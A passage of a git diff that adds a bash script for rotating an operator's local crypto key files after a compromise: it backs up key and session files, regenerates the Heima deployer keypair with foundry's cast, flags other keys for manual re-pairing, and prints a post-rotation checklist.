+ ;; +esac diff --git a/scripts/rotate-local-keys.sh b/scripts/rotate-local-keys.sh new file mode 100755 index 00000000..eeb834ee --- /dev/null +++ b/scripts/rotate-local-keys.sh @@ -0,0 +1,124 @@ +#!/usr/bin/env bash +# scripts/rotate-local-keys.sh — rotate the operator's LOCAL key files after a +# compromise (see docs/security-incident-response.md §2a). +# +# Surgical security helper — run on its own (NOT a deploy entry point). It: +# 1. Backs up every key file under ~/.agentkeys (timestamped, 0600) — NEVER deletes, +# so a leaked deployer key still works long enough to sweep funds. +# 2. Rotates the Heima DEPLOYER key (the critical one — gas payer + registry owner): +# generates a fresh keypair, writes it in the existing file's format, prints the +# OLD + NEW addresses. +# 3. Enumerates the OTHER key files (agent device keys, etc.) and flags which need a +# re-pair vs a simple regenerate — those are NOT auto-rotated (rotating an agent +# key orphans its on-chain registerAgentDevice; that's a deliberate re-pair). +# 4. Prints the post-rotation checklist (sweep funds, re-fund, update env, re-own). +# +# It does NOT move funds, call the chain, or touch GitHub/AWS — those are deliberate +# steps you run yourself (sweep BEFORE retiring the old key). 
+#
+# Usage:
+#   bash scripts/rotate-local-keys.sh            # rotate the deployer key (prompts)
+#   bash scripts/rotate-local-keys.sh --dry-run  # show what would happen, change nothing
+#   bash scripts/rotate-local-keys.sh --yes      # no prompt (for a scripted run)
+
+set -euo pipefail
+
+AGENTKEYS_HOME="${AGENTKEYS_HOME:-$HOME/.agentkeys}"
+DEPLOYER_KEY_FILE="${HEIMA_DEPLOYER_KEY_FILE:-$AGENTKEYS_HOME/heima-deployer.key}"
+DRY_RUN=0
+ASSUME_YES=0
+
+while [ $# -gt 0 ]; do
+  case "$1" in
+    --dry-run) DRY_RUN=1; shift ;;
+    --yes|-y) ASSUME_YES=1; shift ;;
+    # --help prints this file's header comment (line 2 up to the `set -euo` line).
+    --help|-h) sed -n '2,/^set -euo/p' "$0" | sed 's/^# \{0,1\}//' | sed '$d'; exit 0 ;;
+    *) echo "unknown flag: $1 (try --help)" >&2; exit 1 ;;
+  esac
+done
+
+# Colours only when stdout is a terminal.
+if [ -t 1 ]; then
+  C_HEAD='\033[1;36m'; C_OK='\033[1;32m'; C_WARN='\033[1;33m'; C_ERR='\033[1;31m'; C_RESET='\033[0m'
+else
+  C_HEAD=''; C_OK=''; C_WARN=''; C_ERR=''; C_RESET=''
+fi
+log() { printf "${C_HEAD}==>${C_RESET} %s\n" "$*"; }
+ok() { printf " ${C_OK}ok${C_RESET} %s\n" "$*"; }
+warn() { printf " ${C_WARN}!!${C_RESET} %s\n" "$*"; }
+die() { printf " ${C_ERR}fail${C_RESET} %s\n" "$*" >&2; exit 1; }
+
+command -v cast >/dev/null 2>&1 || die "cast (foundry) required — install foundry"
+[ -d "$AGENTKEYS_HOME" ] || die "no $AGENTKEYS_HOME — nothing to rotate"
+
+TS="$(date -u +%Y%m%dT%H%M%SZ)"
+BACKUP_DIR="$AGENTKEYS_HOME/.compromised-backup-$TS"
+
+log "Local key rotation — $AGENTKEYS_HOME (backup → $BACKUP_DIR)"
+if [ "$DRY_RUN" = "1" ]; then warn "DRY RUN — no files written"; fi
+
+# ── 1. Back up EVERY key/jwt/session file (never delete) ───────────────────────
+# Backup directories left by earlier runs live inside $AGENTKEYS_HOME; prune them so
+# a re-run does not back up (and later list) the backups themselves.
+# A read loop is used instead of `mapfile` so this also works on bash 3.2.
+KEYFILES=()
+while IFS= read -r f; do
+  KEYFILES+=("$f")
+done < <(find "$AGENTKEYS_HOME" -maxdepth 3 \
+  -type d -name '.compromised-backup-*' -prune -o \
+  -type f \( -name '*.key' -o -name '*.jwt' -o -name 'session.json' \) -print 2>/dev/null | sort)
+if [ "${#KEYFILES[@]}" -eq 0 ]; then warn "no key files found under $AGENTKEYS_HOME"; fi
+if [ "$DRY_RUN" = "0" ]; then mkdir -p "$BACKUP_DIR"; chmod 700 "$BACKUP_DIR"; fi
+# ${arr[@]+...} keeps `set -u` from tripping on an empty array in bash < 4.4.
+for f in ${KEYFILES[@]+"${KEYFILES[@]}"}; do
+  rel="${f#"$AGENTKEYS_HOME"/}"
+  if [ "$DRY_RUN" = "0" ]; then
+    mkdir -p "$BACKUP_DIR/$(dirname "$rel")"
+    cp -p -- "$f" "$BACKUP_DIR/$rel"
+    chmod 600 "$BACKUP_DIR/$rel"
+    ok "backed up $rel"
+  else
+    ok "would back up $rel"
+  fi
+done
+
+# ── 2. Rotate the DEPLOYER key (critical) ──────────────────────────────────────
+# Defaults so the checklist below still expands under `set -u` when no key is rotated.
+OLD_ADDR='(none — deployer key not rotated)'
+NEW_ADDR='(none — deployer key not rotated)'
+if [ -f "$DEPLOYER_KEY_FILE" ]; then
+  OLD_RAW="$(tr -d '[:space:]' < "$DEPLOYER_KEY_FILE")"
+  # Remember whether the file stored the key with a 0x prefix; cast wants the prefix.
+  HAD_0X=0; OLD_PK="0x$OLD_RAW"
+  case "$OLD_RAW" in 0x*) HAD_0X=1; OLD_PK="$OLD_RAW" ;; esac
+  OLD_ADDR="$(cast wallet address --private-key "$OLD_PK" 2>/dev/null || echo '??')"
+  log "Deployer key: $DEPLOYER_KEY_FILE (old address $OLD_ADDR)"
+  warn "This address is the gas payer AND the SidecarRegistry owner. SWEEP ITS FUNDS FIRST."
+  if [ "$DRY_RUN" = "1" ]; then
+    # Nothing is generated in a dry run, so there is no new address to report.
+    NEW_ADDR='(dry run — not generated)'
+    warn "DRY RUN — would generate a new keypair and overwrite $DEPLOYER_KEY_FILE"
+  else
+    # HEIMA_DEPLOYER_KEY_FILE may point outside $AGENTKEYS_HOME (or not match the
+    # find patterns above), so back the old key up explicitly BEFORE anything can
+    # overwrite it. Under `set -e` a failed copy aborts the rotation.
+    DEPLOYER_BACKUP="$BACKUP_DIR/deployer-key.pre-rotation"
+    cp -p -- "$DEPLOYER_KEY_FILE" "$DEPLOYER_BACKUP"
+    chmod 600 "$DEPLOYER_BACKUP"
+    if [ "$ASSUME_YES" = "0" ]; then
+      printf " rotate the deployer key now? old key is backed up. [y/N] "; read -r ans || ans=''
+      case "$ans" in y|Y|yes) ;; *) die "aborted — no key rotated (backup kept)" ;; esac
+    fi
+    NEW_JSON="$(cast wallet new --json 2>/dev/null)" || die "cast wallet new failed"
+    # Accept both compact and pretty-printed JSON (optional whitespace around ':').
+    NEW_PK="$(printf '%s' "$NEW_JSON" | sed -n 's/.*"private_key"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p')"
+    NEW_ADDR="$(printf '%s' "$NEW_JSON" | sed -n 's/.*"address"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p')"
+    [ -n "$NEW_PK" ] && [ -n "$NEW_ADDR" ] || die "cast wallet new produced no keypair"
+    OUT="$NEW_PK"
+    if [ "$HAD_0X" = "0" ]; then OUT="${NEW_PK#0x}"; fi  # preserve the file's 0x-or-bare format
+    (umask 077 && printf '%s\n' "$OUT" > "$DEPLOYER_KEY_FILE"); chmod 600 "$DEPLOYER_KEY_FILE"
+    ok "deployer key ROTATED → new address $NEW_ADDR"
+    echo
+    printf "${C_WARN} NEW DEPLOYER ADDRESS: %s${C_RESET}\n" "$NEW_ADDR"
+    printf " OLD (retire after sweeping): %s\n" "$OLD_ADDR"
+  fi
+else
+  warn "no deployer key at $DEPLOYER_KEY_FILE — skipping deployer rotation"
+fi
+
+# ── 3. Flag the OTHER key files (not auto-rotated) ─────────────────────────────
+echo
+log "Other local keys — review/rotate MANUALLY (rotating these needs a re-pair):"
+for f in ${KEYFILES[@]+"${KEYFILES[@]}"}; do
+  rel="${f#"$AGENTKEYS_HOME"/}"
+  case "$rel" in
+    "${DEPLOYER_KEY_FILE#"$AGENTKEYS_HOME"/}") ;;  # already done
+    *agent-device.key) warn "$rel — agent K10; regenerate ⇒ the agent must RE-PAIR (registerAgentDevice is keyed to the old K10)" ;;
+    *.jwt|*session.json) warn "$rel — session bearer; revoke/re-issue via re-onboard (not a keypair)" ;;
+    *) warn "$rel — review: rotate if it's a standalone secret" ;;
+  esac
+done
+
+# ── 4. Post-rotation checklist ─────────────────────────────────────────────────
+# Unquoted heredoc: $OLD_ADDR, $NEW_ADDR and $BACKUP_DIR expand; \$(...) stays literal.
+# NOTE(review): the heredoc opener and the `cast send` placeholders were lost in this
+# copy of the patch and are reconstructed here — confirm against the original commit.
+cat <<EOF
+
+$(printf "${C_HEAD}==>${C_RESET}") Post-rotation checklist (do these yourself — see docs/security-incident-response.md §2a):
+  1. Sweep funds: send all HEI from the OLD deployer ($OLD_ADDR) to the NEW one
+     (cast send $NEW_ADDR --value AMOUNT --private-key \$(cat $BACKUP_DIR/...) ...). Old key still works.
+  2. Re-fund the NEW deployer; update scripts/operator-workstation.env if the address is referenced.
+  3. Re-own the registry: the owner is the OLD deployer (no transferOwnership). Either keep it
+     (old key swept + retired) or redeploy: FORCE_DEPLOY=1 bash scripts/heima-bring-up.sh
+     → commit heima.json + operator-workstation.env → setup-broker-host.sh --ref main.
+  4. Push the new key into the GitHub secret: bash scripts/rotate-github-secrets.sh (TEST_HEIMA_DEPLOYER_KEY).
+  5. Securely delete the backup once you have confirmed the new key works AND the old is swept:
+     rm -rf "$BACKUP_DIR"
+EOF